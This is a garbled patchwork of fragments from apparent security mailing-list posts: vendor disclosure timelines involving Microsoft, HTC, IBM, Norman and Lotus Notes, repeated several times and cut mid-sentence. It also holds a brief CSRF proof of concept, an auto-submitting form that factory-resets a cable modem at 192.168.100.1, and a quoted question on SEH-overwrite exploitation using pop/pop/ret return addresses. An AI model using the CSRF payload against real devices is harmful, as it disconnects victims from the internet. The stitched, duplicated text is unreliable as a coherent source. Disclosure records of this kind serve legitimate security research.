get back
fix and a security bulletin release.
. 2009-11-09:
MSRC acknowledges reception of the new details and PoC and says that it
was passed to the product team to reproduce the bug and that they will
get back in touch soon.
. 2009-11-12:
MSRC says that it agrees about the seriousness of the issue and that it
has now involved the team responsible for the anti-exploitation
mechanisms to assess it correctly. The next estimated time for a status
2010-08-21: Taddong tries to report the vulnerability to HTC through the standard channels (web, e-mail...) without success.
2010-08-23: Taddong contacts other security researchers (Thanks Alberto!) previously involved in reporting vulnerabilities to HTC in order to identify a valid contact or notification channel to let HTC know about the issue.
2010-08-25: Taddong spends around a week trying to identify a secure channel to report the issue to HTC, without any success. Please, read "The Seven Deadly Sins of Security Vulnerability Reporting"!! [1]
2010-09-03: Taddong finally decides to notify HTC about the vulnerability through the only available (but insecure) web channel and sends a brief technical report.
2010-09-04: HTC confirms they "...will investigate (the issue) and get back to us as soon as they get a reply."
2010-09-19: Taddong contacts HTC again (after 15 days) emphasizing this is a serious issue that requires immediate action, as Twitter credentials are directly exposed. Taddong tried to get an estimated date when an update would be available in order to proceed to publicly and responsibly disclose the vulnerability.
2010-09-20: HTC replies and they "...apologize for the inconvenience and the delay. The case is being investigated and they will get back to us as soon as they get a reply."
2010-10-03: Taddong contacts HTC again (one month since the initial notification) in order to gather specific details, such as an official confirmation of the vulnerability and an estimated fix release date, trying to coordinate the publication of the associated advisory.
2010-10-10: No response was received from HTC. Taddong tries to contact HTC again (+1 week).
2010-10-22: HTC replies apologizing (again) for the delay and... asking for "all the details for further investigation"? Taddong replies and clarifies it is still waiting for a confirmation or any chance to discuss the technical details. At the same time, an estimated deadline is set by Taddong for the public release on November 4, 2010 (two months since the original notification).
I was asking if ws2_32.dll was compiled with SafeSEH (didn't know about the Olly plugin). Regarding the return address...I already have control of EIP, but can't point it directly to the stack, so I'm searching for a module with a suitable return address (with pop/pop/ret) to help me get back to that buffer. The issue was with the return address I was pointing to, and the fact that it the module was compiled with SafeSEH. Is that enough detail?
<script>
document.getElementById(1).submit();
</script>
This CSRF will disconnect the user from the internet for longer.
“The process to get back online from a factory default condition could take from 5 to 30 minutes.”
<html>
<form id=2 method=post action=’http://192.168.100.1/configdata.html’>
<input name=’BUTTON_INPUT’ value=’Reset+All+Defaults’>
</form>
<html>
TZ> 02.04.2009 - Forced partial disclose
TZ> 02.04.2009 - An known contact at IBM asks for the POC
TZ> 02.04.2009 - POC is resend
TZ> 02.04.2009 - An third person is added to the coordination "list"
TZ> 04.04.2009 - Sending another POC file (RAR)
TZ> 06.04.2009 - POC is acknowledged and promise is made to get back
TZ> once the material has been analysed.
TZ> 10.04.2009 - Sending another POC file (ZIP)
TZ> 10.04.2009 - The third person ergo the "Cyber
TZ> Incident & Vulnerability Handling PM" is taking over coorindation
23/03/2009 : Asking for an update for the RAR Size sample
02/04/2009 : Norman confirms reproduction of RAR Method PoC and that they will release
the patch a.s.a.p
02/04/2009 : Norman promises to get back with release dates/advisory information as soon
as they have some firm dates
06/04/2009 : Norman confirms reproduction of RAR Headflags PoC
20/04/2009 : Norman confirms reproduction of the CAB PoC and that all reported
02.04.2009 - Forced partial disclose
02.04.2009 - An known contact at IBM asks for the POC
02.04.2009 - POC is resend
02.04.2009 - An third person is added to the coordination "list"
04.04.2009 - Sending another POC file (RAR)
06.04.2009 - POC is acknowledged and promise is made to get back
once the material has been analysed.
10.04.2009 - Sending another POC file (ZIP)
10.04.2009 - The third person ergo the "Cyber
Incident & Vulnerability Handling PM" is taking over coorindation
12:39 - CPU usage is still 100%, web server is not responsive.
13:08 - CPU usage is still 100%, web server is responsive.
14:08 - CPU usage is 97%
14:34 - CPU usage is 97%
Two hours later the CPU usage didn't get back to normal.
However, the web server is responding.
After I manually restart the Apache process, CPU usage gets back to normal.
However, those 65535 temporary files were not deleted.
TZ>> 02.04.2009 - Forced partial disclose
TZ>> 02.04.2009 - An known contact at IBM asks for the POC
TZ>> 02.04.2009 - POC is resend
TZ>> 02.04.2009 - An third person is added to the coordination "list"
TZ>> 04.04.2009 - Sending another POC file (RAR)
TZ>> 06.04.2009 - POC is acknowledged and promise is made to get back
TZ>> once the material has been analysed.
TZ>> 10.04.2009 - Sending another POC file (ZIP)
TZ>> 10.04.2009 - The third person ergo the "Cyber
TZ>> Incident & Vulnerability Handling PM" is taking over coorindation
appropriate to solve these issues.
. 2009-09-04:
Microsoft thanks Core for postponing publication and says that it is
still discussing the fix plan and release date with the IE team and that
it will get back to Core in a week with the list of vulnerable platforms
and estimated patch release date.
. 2009-10-09:
Received a summary from Microsoft with an update on all open cases with
Core. Internet Explorer cases appear listed as "working with product
* 19/10/2009: Vendor replies to our mail asking for details.
* 26/10/2009: Recontact vendor, ask for a valid pgp key.
* 05/11/2009: Recontact vendor who failed at providing a valid pgp key.
* 15/11/2009: Receive a valid pgp key from vendor. Provide details,
including two PoCs to the Vendor.
* 16/12/2009: Recontact the vendor who doesn't get back to us.
* 05/01/2010: Vendor asks for more details including a complete bug analysis
and patches.
* 06/01/2010: Provide full analysis and patches to the vendor.
* 06/01/2010: Vendor claims to have silently patched the vulnerability in
their development branch.
> I was asking if ws2_32.dll was compiled with SafeSEH (didn't know
> about the Olly plugin). Regarding the return address...I already
> have control of EIP, but can't point it directly to the stack, so
> I'm searching for a module with a suitable return address (with
> pop/pop/ret) to help me get back to that buffer. The issue was with
> the return address I was pointing to, and the fact that it the
> module was compiled with SafeSEH. Is that enough detail?
>
draft advisory document. Core indicates that the publication date for the
security advisory is flexible and could be changed (postponed or brought
forward) on the basis of concrete and precise information about
availability of fixes. Security contact information for Autonomy requested.
2007-09-19: Email from Lotus Notes security indicating that the bugs will
be investigated and that will check and get back regarding the request
contact of information for Autonomy.
2007-09-20: Email from Lotus Notes Security requesting proof-of-concept
code to validate the finding.
2007-09-21: Proof-of-concept code and sample of a malicious file sent to
Lotus Notes Security
cheers,
--dr
P.s. The gentleman from McAfee who phoned me about his
submission whose name I've forgotten, we didn't get your
mail, please get back in touch.
--
World Security Pros. Cutting Edge Training, Tools, and Techniques
Tokyo, Japan November 29/30 - 2007 http://pacsec.jp
pgpkey http://dragos.com/ kyxpgp
cheers,
--dr
P.s. To the gentleman from McAfee who phoned me about his
submission, whose name I've forgotten: we didn't get your
mail, please get back in touch.
--
World Security Pros. Cutting Edge Training, Tools, and Techniques
Tokyo, Japan November 29/30 - 2007 http://pacsec.jp
pgpkey http://dragos.com/ kyxpgp
This problem effects all versions of Puppet Dashboard.
When I reported this as a problem to Puppet Labs, their response was
also alarming:
"I'm sorry it took so long to get back to you. We definitely don't
recommend people put their Dashboards on public internet, but it's not
a code level security problem for us. I have instructed to docs
people here to update to reflect the recommendation more strongly."
Puppet Dashboard is wide open by default, has no built in security.
girl who made $1000000 (a million) out of the on-line world. This
means that today crooks are after your virtual persona rather then
your physical self. Therefore, security in virtual worlds is almost as
important as security in the physical world.
Now let's get back to the real issue. Attackers can steal the victim's
login credentials, therefore hijacking their virtual persona, by
simply tricking them into visiting a malicious Web page.
It is automatic and the user doesn't have to do anything (no user
interaction is required). I would rate this issue as Medium risk
|
